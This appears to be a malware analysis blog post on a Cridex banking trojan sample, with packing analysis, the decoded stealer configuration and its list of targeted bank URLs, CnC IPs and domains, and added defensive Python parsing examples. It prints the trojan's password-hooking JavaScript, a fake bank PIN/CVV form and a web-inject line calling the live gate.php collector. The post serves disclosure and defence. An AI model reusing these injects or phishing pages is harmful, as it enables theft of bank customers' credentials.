0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 08 00 8C 32 CB 50 00 00 00 00    PE..L....2.P....
0090   00 00 00 00 E0 00 0F 03 0B 01 06 09 00 24 00 00    .............$..
00A0   00 60 00 00 00 02 00 00 40 12 00 00 00 10 00 00    .`......@.......
00B0   00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00    .@....@.........
00C0   04 00 00 00 05 00 04 00 04 00 00 00 00 00 00 00    ................
00D0   00 30 02 00 00 04 00 00 12 A2 00 00 02 00 00 00    .0..............
 :                           :                                   :
// disassembly 1st block...
0x401240 mov ebp esp 
0x401241 sub esp 0x8 
0x401243 mov [esp] 0x2 
0x401246 call [0x40912c] 
0x40124d call 0x401100L 
0x401253 nop 
0x401258 lea esi [esi+0x0] 
0x401259 push ebp 
0x401260 mov ecx [0x409164] 
0x401261 mov ebp esp 
0x401267 pop ebp 
0x401269 jmp ecx 
    :     :   :
//PE Analysis:
MD5:       06c032711f0cfae2c443b3926253b296 
SHA-1:       0f129c1e331c3cf08eec5461a3e1d54e7f40932a 
File Size:   120,320 Bytes
Image Base : 0x400000
Entry Point: 0x1000
Sections:
   .text 0x1000 0x238c 9216 < EP
   .data 0x4000 0x10e0 4608
   .rdata 0x6000 0x1920 6656
   .bss 0x8000 0x200 0       
   .idata 0x9000 0x3fc 1024
   .rsrc 0xa000 0xbc4 3072
   DATA 0xb000 0x17000 94208  <==== packed..
   DATA 0x22000 0x1000 512

//Suspicious Points:
CRC Failed: Claimed: 41490 Actual:  181202
Compiled Time: 0x50CB328C [Fri Dec 14 14:07:08 2012 UTC] // freshies! :-))
Packer: MinGW GCC 3.x <==== this mess making hard to read
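The section table above is what gives the "packed" verdict away: the DATA section at 0xb000 holds 94208 of the file's 120320 bytes while the code section is only 9216, and a compiler-emitted MinGW image would not normally carry its bulk in a single data section. The block below is an added example, not code from the post, that turns that eyeballing into two checks a triage script can apply to any section table: Shannon entropy per section and the share of the file's raw bytes a non-code section holds. The section names and sizes in `SAMPLE_SECTIONS` follow the table above, but the byte contents are constructed here (the real bytes are not on the page); `pseudo_random_bytes` stands in for packed data.

```python
import hashlib
import math


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes.
    Compressed or encrypted payloads sit close to 8; code and text sit well below."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def flag_sections(sections, high_entropy=7.0, big_share=0.5):
    """sections: list of dicts with name, virtual_size, raw_size, data.
    Returns {name: [reasons]} for sections that look packed/encrypted:
      * entropy at or above high_entropy bits/byte
      * a section other than .text that holds most of the file's raw bytes"""
    total_raw = sum(s["raw_size"] for s in sections) or 1
    findings = {}
    for s in sections:
        reasons = []
        ent = shannon_entropy(s["data"])
        if ent >= high_entropy:
            reasons.append(f"entropy {ent:.2f} bits/byte")
        share = s["raw_size"] / total_raw
        if s["name"] != ".text" and share >= big_share:
            reasons.append(f"holds {100 * share:.0f}% of raw bytes")
        if reasons:
            findings[s["name"]] = reasons
    return findings


def pseudo_random_bytes(n, seed=b"sample"):
    """Deterministic high-entropy filler (SHA-256 chain) standing in for packed data."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed sample shaped like the post's section table; contents are made up.
SAMPLE_SECTIONS = [
    {"name": ".text", "virtual_size": 0x238c, "raw_size": 9216,
     "data": (b"\x55\x89\xe5\x83\xec\x08\xc7\x04\x24\x02\x00\x00\x00" * 709)[:9216]},
    {"name": ".rdata", "virtual_size": 0x1920, "raw_size": 6656,
     "data": (b"This program cannot be run in DOS mode.\r\n" * 163)[:6656]},
    {"name": ".bss", "virtual_size": 0x200, "raw_size": 0, "data": b""},
    {"name": "DATA", "virtual_size": 0x17000, "raw_size": 94208,
     "data": pseudo_random_bytes(94208)},
]

if __name__ == "__main__":
    for name, reasons in flag_sections(SAMPLE_SECTIONS).items():
        print(name, "->", "; ".join(reasons))
```

Note that raw size slightly above virtual size (9216 vs 0x238c for .text above) is just file-alignment rounding and not a signal, which is why the heuristic compares shares of the file rather than the two size columns.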

// loaded DLLs:
ntdll.dl    0x7C900000   0x000AF000 
kernel32.dl 0x7C800000   0x000F6000 
msvcrt.dll  0x77C10000   0x00058000 

// The traces of calls that are "readable":
KERNEL32.dll.AddAtomA Hint[1]
KERNEL32.dll.ExitProcess Hint[155]
KERNEL32.dll.FindAtomA Hint[175]
KERNEL32.dll.GetAtomNameA Hint[220]
KERNEL32.dll.GetModuleHandleA Hint[335]
KERNEL32.dll.SetUnhandledExceptionFilter Hint[735]

So what happened if we run this malware? (summary)

I'll make it short and simple: it is a Cridex..
It drops junk to %Temp% (like exp*.tmp) and also to %AppData%, self-deletes, and then executes CMD to run %AppData%\KB00085031.exe (after being self-copied/dropped).
These processes were kicked off by KB00085031.exe:
ctfmon.exe // with code injection into other processes
svchost.exe

Network Analysis

For the network traffic, it does exactly as described in the previous post here--->[PrevPost] I'm sorry friends, there's nothing new in it.

(Main Course) How the stolen information grabbed & sent..

I will describe a shocking fact that I frankly just realized, after being advised by Blake (with thanks!), author of the legendary tool Jsunpack; let me try to explain as below: the incoming data, which looks like encrypted binary, was actually decoded by the malware itself and saved as binary in a registry key <==POINT! In this case the key is at:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\[random]\
And it has the value of the below strings:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 
34 39 64 63 38 39 66 30 36 38 65 38 63 36 32 65 
35 35 39 33 31 32 65 31 66 63 32 30 33 66 38 39 
62 66 64 39 65 38 38 36 22 3E 3C 68 74 74 70 73 
          : 
       snipped
Copy & paste this code into a binary editor and you'll get the view below: OK, it's TEXT. So let's save it as a text file to view it well... Snipped below:
 <settings hash="49dc89f068e8c62e559312e1fc203f89bfd9e886"><httpshots..
/(html|plain)">/bb/logon/</url><url contentType="^text/(html|plain)">.. 
ccm/</url><url contentType="^text/(html|plain)">/cmmain\.cfm</url><ur..
="^text/(html|plain)">/ebc_ebc1961/</url><url contentType="^text/(htm..
entType="^text/(html|plain)">/livewire/</url><url contentType="^text/..
ser/</url><url contentType="^text/(html|plain)">/smallbiz/</url><url.. 
in)">2checkout\.com</url><url contentType="^text/(html|plain)">ablv\...
ain)">accountoverview\.aspx</url><url contentType="^text/(html|plain)..
pe="^text/(html|plain)">achworks\.com</url><url contentType="^text/(h..
com</url><url contentType="^text/(html|plain)">atbonlinebusiness\.com..
">baltikums\.eu</url><url contentType="^text/(html|plain)">banesco\.c..
banking\.firsttennessee\.biz</url><url contentType="^text/(html|plain..
^text/(html|plain)">business\.swedbank\.lv</url><url contentType="^te..
   :             :                        :
You can see the beautiful format of raw one here --->>[PASTEBIN]
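Both the registry dump in the first post ("Save that as binary with the TXT filename") and the one here are the same step: the hex bytes are the `<settings>` document as-is, so decoding them is a matter of turning the hex pairs back into bytes. The block below is an added example, not code from the post, that does that conversion and then pulls out what a defender wants from the decoded document: the `<url>` rules with their `type`/`contentType` attributes (the match patterns for targeted sites), every injected `<script src=...>` (the gate.php collector) and the config hash. `SAMPLE_CONFIG_TEXT` is a constructed miniature of the document, rendered into the "3C 73 65 ..." form so the decode path runs offline; the host names and hash in it are placeholders, not values from the post.

```python
import re

# Constructed sample: a miniature <settings> document in the shape shown on
# the page. The hash and host names are placeholders, not from the post.
SAMPLE_CONFIG_TEXT = (
    '<settings hash="0000000000000000000000000000000000000000">'
    '<httpshots>'
    '<url type="deny">\\.(css|js)($|\\?)</url>'
    '<url contentType="^text/(html|plain)">https://(www\\.|)examplebank\\.test/</url>'
    '<url contentType="^text/(html|plain)">business\\.examplebank\\.test</url>'
    '</httpshots>'
    '<httpinjects><httpinject>'
    '<conditions><url type="allow" contentType="^text/(html|plain)">examplebank\\.test</url></conditions>'
    '<actions><modify><pattern><![CDATA[</html.*?>(.*?)]]></pattern>'
    '<replacement><![CDATA[<script type="text/javascript" '
    'src="http://c2-placeholder.invalid:8080/ipckg/gate.php?botid=BOT-ID&bank=examplebank"></script>]]></replacement>'
    '</modify></actions></httpinject></httpinjects>'
    '</settings>'
)
# Rendered the way the registry value is printed in the post: "3C 73 65 ..."
SAMPLE_HEX_DUMP = " ".join(f"{b:02X}" for b in SAMPLE_CONFIG_TEXT.encode("ascii"))

URL_RULE_RE = re.compile(r"<url([^>]*)>(.*?)</url>", re.S)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
INJECT_SRC_RE = re.compile(r'<script[^>]*\ssrc="([^"]+)"', re.I)
HASH_RE = re.compile(r'<settings\s+hash="([0-9a-fA-F]+)"')


def hex_dump_to_text(dump):
    """Turn the space/newline-separated "XX XX" bytes back into text. Non-hex
    characters (line breaks, the ':' snip markers) are dropped, so a snipped
    dump decodes cleanly up to the gap and may be garbled after it."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", dump)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits: dump is truncated mid-byte")
    return bytes.fromhex(digits).decode("latin-1")


def parse_stealer_config(text):
    """Extract the per-URL rules, injected script sources and config hash.
    Regexes rather than an XML parser, because the real document carries
    CDATA and regex metacharacters and is not guaranteed to be well-formed."""
    rules = [{"attrs": dict(ATTR_RE.findall(attrs)), "pattern": pattern}
             for attrs, pattern in URL_RULE_RE.findall(text)]
    m = HASH_RE.search(text)
    return {
        "hash": m.group(1) if m else None,
        "rules": rules,
        "inject_sources": sorted(set(INJECT_SRC_RE.findall(text))),
    }


def targeted_patterns(config):
    """The regexes the stealer matches visited URLs against, deny rules excluded;
    this is the list to turn into a watchlist for the sites being targeted."""
    return [r["pattern"] for r in config["rules"] if r["attrs"].get("type") != "deny"]


if __name__ == "__main__":
    cfg = parse_stealer_config(hex_dump_to_text(SAMPLE_HEX_DUMP))
    print("hash:", cfg["hash"])
    print("targets:", targeted_patterns(cfg))
    print("collectors:", cfg["inject_sources"])
```

The first 16 bytes printed above, `3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22`, decode to `<settings hash="`, which is the quickest sanity check that a dump has been copied with its byte boundaries intact.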

What is this?

This is the configuration file of the trojan stealer itself. In this data it is well defined what to fetch, where to fetch, how to send, where to send, how to defraud, how to encrypt the data, etc. I'll give some examples below: it defines https saved data of banking/cashing online sites, & how to fetch the path containing the credentials' handle config:
https://(www\.|)cashanalyzer\.com/
https://(www\.|)enternetbank\.com/
https://(www\.|)nashvillecitizensbank\.com/
https://.*citizensbank\.com/
https://.+\.firsttennessee\.com/
https://.*firstcitizens\.com/
https://(bolb\-(west|east)|www)\.associatedbank\.com/
https://.*secure\.fundsxpress\.com/
https://usgateway\d*\.rbs\.com/
https://(www\.|)svbconnect\.com/
https?://(www\d*\.|)(ntrs|northerntrust)\.com/
https://cib\.bankofthewest\.com/
https://.+\.unionbank\.com/
https://webbankingforbusiness\.mandtbank\.com/
https://ifxmanager\.bnymellon\.com/
https://(ecash\.|.+/cashman/)
https://alphabank\.com
https://banking\.calbanktrust\.com/
https://(www\.|)efirstbank\.com/
https://singlepoint\.usbank\.com/
https://business-eb\.ibanking-services\.com/
https://www8\.comerica\.com/
https://.+\.53\.com/
https://businessonline\.tdbank\.com/
https://.+\.jpmorgan\.com/
https://(www\.|)cashanalyzer\.com/
https://business-eb\.ibanking-services\.com/
https://businessonline\.tdbank\.com
https://.+.tdcommercialbanking\.com/
https://chaseonline.chase.com
   :
 (and so many more of this..)
↑following the domain is the path of the credentials.. Defining domains of other banking/cash online sites:
business\.swedbank\.lv
myonline\.bankbv\.com
banknet\.lv
bankofcyprus\.com
bankonline\.sboff\.com
bankonline\.umpquabank\.com
bmoharrisprivatebankingonline\.com
   :
   :
  (have about 10more of these...)
↑followed by the path of credentials.. Or also other sites with credentials....
https://.+/(wcmfd/wcmpw|phcp/servlet)/
https://.+/pub/html/
https://direct.53.com
  :
There is also a javascript command to encrypt the credentials before they are sent to these moronz, see below:
 if(typeof window.EncryptPassword=='function')
 {
   var fn=window.EncryptPassword;
   window.EncryptPassword=function(id)
   {
     try
     {
       var e=document.getElementById(id);
       var i=document.createElement("input");
       i.type="hidden";
       i.name="OPN";
       i.value=e.value;
       document.Form1.appendChild(i);
     }
     catch(e)
     {
     }
     return fn(id);
   };
 }
Not only those above, these moronz also fake the online banking page to directly fool you & phish your account credentials too, PoC:
<td class="inputField1" align="right">
 ATM or Debit Card PIN:
 </td>
 <td class="initialtext" style="padding:4px;" >
 <input type="password" class="myinputs" id="acpin" maxlength="12" size="3" name="acpin" />
 </td>
 </tr>
 <tr>
 <td class="inputField1" align="right">
 3- or 4-digits security code:
 </td>
 <td class="initialtext" style="padding:4px;" >
 <input type="password" class="myinputs" id="cvv" maxlength="4" size="3" name="cvv2" />
 </td>
 </tr>
 <tr>
 <td colspan="2">
 <p class="graytext">
 Please be patient as we process your information.</p>
 </td>
 </tr>
 </table>
 </td>
 </tr>
 <tr>
 <td>
 </td>
 <td>
 <!-- BEGIN art_SA_edu_edu_instr.xml -->
 <span class="bodytext">
 Click "Next" to continue Identity verification process.
 </span>
 <!-- END of art_SA_edu_edu_instr in DCTM ECP -->
 </td>
 </tr>
 <tr>
 <td colspan="2">
 </td>
 </tr>
 <tr>
 <td>
 </td>
 <td>
 <span class="bodytext">
 <label title="Go to Enter Card">
 </label>
 </span>
 </td>
 </tr>
 <tr>
   :
etc etc
It also enrolls your PC in the botnet. i.e.: there goes my poor test PC's bot ID, which was sent to the CnC as a Bot....
<modify><pattern>
<![CDATA[</html.*?>(.*?)]]></pattern><replacement>
<![CDATA[<script type="text/javascript" src="h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase"></script>]]>
</replacement></modify></actions></httpinject>
<httpinject><conditions><url type="deny">\.(css|js)($|\?)</url>
<url type="allow" contentType="^text/(html|plain)">
So, practically, your infected PC (like my test machine) is registered as a Bot in the CnC. The URL format used to send the phished data is plain text:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
Indicating the CnC data collector behind the proxy at
78.159.121.128:8080
via the paths/URIs below:
h00p://78.159.121.128:8080/career/
h00p://78.159.121.128:8080/ipckg/gate.php
Gentlemen, Blake tested these paths, and I did too; they match ALL of our latest previous findings. No changes so far. Better to shut down 78.159.121.128 soon, which will slow down their infection campaign. And.. maybe you will find additional shocking or useful facts? Please share! :-)
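As an added example (not part of the original post), the snippet below shows how a defender can work with the two artifacts above: it parses an httpinject fragment in the same layout as the decrypted config to pull out the allow-regex and the injected script URL, turns that URL into a host/path pair for proxy blocking, and scans proxy log lines for the gate.php?botid=...&bank=... check-in format. The config fragment, the log lines, the host cnc.example.invalid and the bot ID RIK-0000_0000 are all constructed placeholders, not the live values.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs

# Constructed httpinject fragment modelled on the decrypted config above; the
# real CnC address is replaced with a placeholder host (not the live IP).
SAMPLE_CONFIG = """<httpinjects>
<httpinject><conditions><url type="deny">\\.(css|js)($|\\?)</url>
<url type="allow" contentType="^text/(html|plain)">https://chaseonline\\.chase\\.com/</url>
</conditions><actions><modify><pattern>
<![CDATA[</html.*?>(.*?)]]></pattern><replacement>
<![CDATA[<script type="text/javascript" src="http://cnc.example.invalid:8080/ipckg/gate.php?botid=RIK-0000_0000&bank=chase"></script>]]>
</replacement></modify></actions></httpinject>
</httpinjects>"""

# Constructed proxy log lines: one bot checking in twice, one clean request.
SAMPLE_LOG = [
    'GET http://cnc.example.invalid:8080/ipckg/gate.php?botid=RIK-0000_0000&bank=chase 200',
    'GET http://www.example.com/news.html 200',
    'GET http://cnc.example.invalid:8080/ipckg/gate.php?botid=RIK-0000_0000&bank=wellsfargo 200',
]

SRC_RE = re.compile(r'src="(https?://[^"]+)"')

def injected_scripts(config_xml):
    """Map each httpinject's allow-regex to the remote script URL its replacement injects."""
    hits = []
    for inj in ET.fromstring(config_xml).iter("httpinject"):
        allow = [u.text for u in inj.iter("url") if u.get("type") == "allow"]
        for rep in inj.iter("replacement"):
            for url in SRC_RE.findall(rep.text or ""):
                hits.append((allow[0] if allow else None, url))
    return hits

def gate_indicators(urls):
    """Reduce injected script URLs to (host:port, path) pairs usable as proxy block rules."""
    return sorted({(urlsplit(u).netloc, urlsplit(u).path) for u in urls})

def scan_proxy_log(lines, gate_path="/ipckg/gate.php"):
    """Report (botid, bank) for every logged request hitting the gate path with a bot ID."""
    found = []
    for line in lines:
        for token in line.split():
            parts = urlsplit(token)
            q = parse_qs(parts.query)
            if parts.path == gate_path and "botid" in q:
                found.append((q["botid"][0], q.get("bank", [""])[0]))
    return found
```

Feeding the real decrypted config in place of SAMPLE_CONFIG yields the block list directly; the bank parameter in each check-in tells you which injected page the victim was on.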

Virus Total Detection Ratio

The Payload is... (Wanna bet? Lower than 5 or less?) Here:
SHA1: 0f129c1e331c3cf08eec5461a3e1d54e7f40932a
MD5: 06c032711f0cfae2c443b3926253b296
File size: 117.5 KB (120320 bytes)
File name: test89237201835362.bin
File type: Win32 EXE
Detection Ratio: 5 / 46
Analysis date: 2012-12-14 21:10:08 UTC (1 hour, 15 min ago)
URL ---------->>[CLICK]
With interesting malware names:
TrendMicro-HouseCall : PAK_Generic.001
Sophos : Mal/Zbot-IQ
TrendMicro : PAK_Generic.001
Kaspersky : Trojan.Win32.Bublik.wcz
Panda : Trj/Genetic.gen
While the landing page is...
(I cannot upload it to VT somehow...)

What's the moral of this story?

Firstly, please grep whether your banks are in the target list. (Again) See the pastebin here to search-->>[PASTEBIN] Now maybe you understand why we always tweet about this group? Can you imagine how frustrated we are, reporting this case for 4 months without it being followed up properly by the authorities? <==PoC: spams of these are still being spotted! This moronz team is sending hundreds of spams daily with 50+ redirectors, ending up at multi-IP (3 or 4) landing pages with PluginDetect BHEK2 payloads of these...

Sample Download

Sorry friends, this time only the sample -->>[CLICK]

Some Network Information

Domain: aviaonlolsio.ru
serial  = 2012010101
refresh = 604800 (7 days)
retry   = 1800 (30 mins)
expire  = 1800 (30 mins)
default TTL = 60 (1 min)

aviaonlolsio.ru.  56   IN    A   217.112.40.69
aviaonlolsio.ru.  56   IN    A   91.142.208.144

ns1.aviaonlolsio.ru.    59      IN   A   69.64.89.82
ns2.aviaonlolsio.ru.    3600    IN   A   62.76.189.72 85.143.166.202
ns3.aviaonlolsio.ru.    3600    IN   A   41.168.5.140
ns4.aviaonlolsio.ru.    3600    IN   A   209.51.221.247
ns5.aviaonlolsio.ru.    3600    IN   A   42.121.116.38
ns6.aviaonlolsio.ru.    3600    IN   A   110.164.58.250
ns7.aviaonlolsio.ru.    60      IN   A   209.51.221.247
ns8.aviaonlolsio.ru.    60      IN   A   163.10.12.83
ns9.aviaonlolsio.ru.    60      IN   A   216.99.149.226
ns10.aviaonlolsio.ru.   60      IN   A   208.87.243.196
ns11.aviaonlolsio.ru.   60      IN   A   203.146.208.180
ns12.aviaonlolsio.ru.   60      IN   A   74.117.61.66

registrar:     NAUNET-REG-RIPN
created:       2012.12.07
paid-till:     2013.12.07
free-date:     2014.01.07
source:        TCI
Last updated on 2012.12.15 05:51:35 MSK

// IP Infector history:
pelamutrika.ru   A  91.142.208.144
aliamognoa.ru    A  91.142.208.144
ahiontota.ru     A  91.142.208.144
anifkailood.ru   A  91.142.208.144
podarunoki.ru    A  91.142.208.144
aseniakrol.ru    A  91.142.208.144
publicatorian.ru A  91.142.208.144
pitoniamason.ru  A  91.142.208.144
amnaosogo.ru     A  91.142.208.144
aviaonlolsio.ru  A  91.142.208.144
dimarikanko.ru   A  91.142.208.144
adanagenro.ru    A  91.142.208.144
awoeionfpop.ru   A  91.142.208.144
aofngppahgor.ru  A  91.142.208.144

pelamutrika.ru   A  217.112.40.69
aliamognoa.ru    A  217.112.40.69
podarunoki.ru    A  217.112.40.69
aseniakrol.ru    A  217.112.40.69
pitoniamason.ru  A  217.112.40.69
aviaonlolsio.ru  A  217.112.40.69
adanagenro.ru    A  217.112.40.69
aofngppahgor.ru  A  217.112.40.69

MalwareMustDie!